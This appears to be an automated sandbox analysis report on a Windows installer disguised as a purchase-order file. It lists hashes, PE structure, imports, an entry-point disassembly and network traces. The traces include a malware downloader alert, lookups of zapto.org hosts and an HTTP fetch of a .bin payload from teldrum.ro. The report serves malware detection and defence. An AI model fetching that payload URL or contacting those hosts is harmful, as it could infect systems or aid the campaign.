                                                                    SSDEEP:6144:UYCRk+MRfSJsWwHbEOzckVBlBGlmSoDSjEDXg9i0C:jCRFMBOsWwHHzckVfAlmSDjY2nC
                                                                    MD5:D0130C4DCAAD741EDD5824614AD1E52E
                                                                    SHA1:77E29B6A09852D8764293B8BFEB932E3C16BB9B0
                                                                    SHA-256:A631F743E3FADFA3EF221EF3467E148B5ECB6925A0B286FA2AB0D404D9BB7038
                                                                    SHA-512:75D7537D0E8D489049413A21E0CCEC2FDAC5811CB1067E87F29C6EF24FDC551A03F495C783110751B69CAFE8CDEBC090C0FDDE76CE49DC429C7F01E9F27793FD
                                                                    Malicious:false
                                                                    Preview:..BBB.........................S..............Y................. ............K......:::.777777.eee....."""......----....```..((...2222."".........................{.._____.........BB.......................}}...................aa.......~~......R....?..................ZZZZ...>>............J...............Y......<.....L....q.+....S..........L.**......R.................4..............::....r......66.........3333..........KKK.E..............^^^..))....^.......9.X........._...............%%........*.i..8.kk.....,,,,,.......................f..............ii.a..........................s.Q..3...`````..,,....!!...................l.............................................N.......L......K.t........I......................fff............<........................@.__......{...........]]]..g..~....................JJJ.......... ....P.........*.>....!!....q.................................[...............s.YY..............ll............l....""".7............!...............FF..L..............z......
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.756588513846525
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Purchase Order No.5817-0001142025.bat.exe
                                                                    File size:617'221 bytes
                                                                    MD5:fb2be2965fb21d400341518012ad4867
                                                                    SHA1:fda727494d927e9b5919ca2b32f71a1d479f540c
                                                                    SHA256:93e42636e6f59d02d0a756054fdadc37644c1c32da55cda0185e7923a8e42126
                                                                    SHA512:4732a136c1e2e7e73f58296013a448edcb528e2c97e664d8ffc145ae471bb323dc6f75431e611d4a2eb6a1966ed39ac772a2afe8584063d1a531cefef870b89b
                                                                    SSDEEP:12288:UnPdMy8JGFmatdgxcG0F3F/eKZIhMznQJSeufSfk:EPdMvJn0tfZsMzReSck
                                                                    TLSH:DCD4F1F6F150C27BE21F0E34EA7269F01984BC79D1E1443B4365BE99F472A61989B80F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                                    Icon Hash:4571753721719a8d
                                                                    Entrypoint:0x403645
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                    Instruction
                                                                    sub esp, 000003F8h
                                                                    push ebp
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebp, ebp
                                                                    push 00008001h
                                                                    mov dword ptr [esp+20h], ebp
                                                                    mov dword ptr [esp+18h], 0040A230h
                                                                    mov dword ptr [esp+14h], ebp
                                                                    call dword ptr [004080A0h]
                                                                    mov esi, dword ptr [004080A4h]
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push eax
                                                                    mov dword ptr [esp+4Ch], ebp
                                                                    mov dword ptr [esp+0000014Ch], ebp
                                                                    mov dword ptr [esp+00000150h], ebp
                                                                    mov dword ptr [esp+38h], 0000011Ch
                                                                    call esi
                                                                    test eax, eax
                                                                    jne 00007FF2A119310Ah
                                                                    lea eax, dword ptr [esp+34h]
                                                                    mov dword ptr [esp+34h], 00000114h
                                                                    push eax
                                                                    call esi
                                                                    mov ax, word ptr [esp+48h]
                                                                    mov ecx, dword ptr [esp+62h]
                                                                    sub ax, 00000053h
                                                                    add ecx, FFFFFFD0h
                                                                    neg ax
                                                                    sbb eax, eax
                                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                                    not eax
                                                                    and eax, ecx
                                                                    mov word ptr [esp+00000148h], ax
                                                                    cmp dword ptr [esp+38h], 0Ah
                                                                    jnc 00007FF2A11930D8h
                                                                    and word ptr [esp+42h], 0000h
                                                                    mov eax, dword ptr [esp+40h]
                                                                    movzx ecx, byte ptr [esp+3Ch]
                                                                    mov dword ptr [00429B18h], eax
                                                                    xor eax, eax
                                                                    mov ah, byte ptr [esp+38h]
                                                                    movzx eax, ax
                                                                    or eax, ecx
                                                                    xor ecx, ecx
                                                                    mov ch, byte ptr [esp+00000148h]
                                                                    movzx ecx, cx
                                                                    shl eax, 10h
                                                                    or eax, ecx
                                                                    movzx ecx, byte ptr [esp+0000004Eh]
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x4a0000x188580x18a0073bbe3fdd1585fbd610b24874590b455False0.22416322969543148data5.2980000367452575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x4a4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14908908079971608
                                                                    RT_ICON0x5ac400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.27520746887966807
                                                                    RT_ICON0x5d1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3553001876172608
                                                                    RT_ICON0x5e2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.48667377398720685
                                                                    RT_ICON0x5f1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43934426229508194
                                                                    RT_ICON0x5fac00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.569043321299639
                                                                    RT_ICON0x603680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.5552995391705069
                                                                    RT_ICON0x60a300x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.18841463414634146
                                                                    RT_ICON0x610980x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4869942196531792
                                                                    RT_ICON0x616000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                                    RT_ICON0x61a680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.26344086021505375
                                                                    RT_ICON0x61d500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 384EnglishUnited States0.3094262295081967
                                                                    RT_ICON0x61f380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                    RT_DIALOG0x620600x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x621600x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x622800x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x622e00xbcdataEnglishUnited States0.601063829787234
                                                                    RT_VERSION0x623a00x174dataEnglishUnited States0.5860215053763441
                                                                    RT_MANIFEST0x625180x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                    DLLImport
                                                                    ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                    SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                    ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                    COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                    USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                    GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                    KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-16T05:12:00.888974+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549974109.99.162.14443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 16, 2025 05:11:59.625569105 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:11:59.625617027 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:11:59.625684023 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:11:59.641050100 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:11:59.641068935 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.599092007 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.599241018 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:00.652689934 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:00.652719975 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.653734922 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.653827906 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:00.655913115 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:00.699354887 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.889029980 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.889103889 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.889172077 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:00.889189959 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:00.891263008 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.008630991 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.008742094 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.009260893 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.009336948 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.010045052 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.010109901 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.011660099 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.011728048 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.129297018 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.129424095 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.129426956 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.129462004 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.129587889 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.129946947 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.129988909 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.130000114 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.130011082 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.130039930 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.130768061 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.130826950 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.131453991 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.131517887 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.132311106 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.132376909 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.133269072 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.133338928 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.249109030 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.249236107 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.249269009 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.249444962 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.249650955 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.249718904 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.250129938 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.250190973 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.250446081 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.250509024 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.251002073 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.251076937 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.251534939 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.251604080 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.251842022 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.251904964 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.252299070 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.252362967 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.252819061 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.252892971 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.253243923 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.253315926 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.253829956 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.253892899 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.254201889 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.254281044 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.341835976 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.341958046 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.341983080 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.342055082 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.369545937 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.369682074 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.369683981 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.369716883 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.369894028 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.369894028 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.370018005 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.370085001 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.370532036 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.370603085 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.370660067 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.370726109 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.371100903 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.371165037 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.374448061 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.374516964 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.374650002 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.374711990 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.374922991 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.374996901 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.375283957 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.375350952 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.375627041 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.375695944 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.376055002 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.376118898 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.376167059 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.376235008 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.376271963 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.376337051 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.376832962 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.376902103 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.434391975 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.434498072 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.434525967 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.434601068 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.461791992 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.461890936 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.461913109 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.461977005 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.462282896 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.462344885 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.462845087 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.462937117 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.463120937 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.463190079 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.463464975 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.463526011 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.463929892 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.463996887 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.464071035 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.464133024 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.464855909 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.464926004 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.465075016 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.465136051 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.465188980 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.465257883 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.465945959 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.466006994 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.489490986 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.489561081 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.489809990 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.489869118 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.526647091 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.526732922 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.526793957 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.526853085 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.527067900 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.527118921 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554183960 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.554265976 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554280996 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.554364920 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.554371119 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554385900 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554392099 CET44349974109.99.162.14192.168.2.5
                                                                    Jan 16, 2025 05:12:01.554409981 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554436922 CET49974443192.168.2.5109.99.162.14
                                                                    Jan 16, 2025 05:12:01.554455996 CET49974443192.168.2.5109.99.162.14
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 16, 2025 05:11:59.540719986 CET6315653192.168.2.51.1.1.1
                                                                    Jan 16, 2025 05:11:59.614238977 CET53631561.1.1.1192.168.2.5
                                                                    Jan 16, 2025 05:12:04.091784954 CET5657753192.168.2.51.1.1.1
                                                                    Jan 16, 2025 05:12:04.100687981 CET53565771.1.1.1192.168.2.5
                                                                    Jan 16, 2025 05:12:04.109869957 CET5905953192.168.2.51.1.1.1
                                                                    Jan 16, 2025 05:12:04.117865086 CET53590591.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 16, 2025 05:11:59.540719986 CET192.168.2.51.1.1.10xf804Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                    Jan 16, 2025 05:12:04.091784954 CET192.168.2.51.1.1.10xbe59Standard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                    Jan 16, 2025 05:12:04.109869957 CET192.168.2.51.1.1.10xbdfeStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 16, 2025 05:11:59.614238977 CET1.1.1.1192.168.2.50xf804No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                    Jan 16, 2025 05:12:04.100687981 CET1.1.1.1192.168.2.50xbe59No error (0)linktreewealth.zapto.org0.0.0.0A (IP address)IN (0x0001)false
                                                                    Jan 16, 2025 05:12:04.117865086 CET1.1.1.1192.168.2.50xbdfeNo error (0)linktreewealthy.zapto.org0.0.0.0A (IP address)IN (0x0001)false
                                                                    • teldrum.ro
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549974109.99.162.144436720C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-16 04:12:00 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: teldrum.ro
                                                                    Cache-Control: no-cache
                                                                    2025-01-16 04:12:00 UTC223INHTTP/1.1 200 OK
                                                                    Date: Thu, 16 Jan 2025 04:12:00 GMT
                                                                    Server: Apache
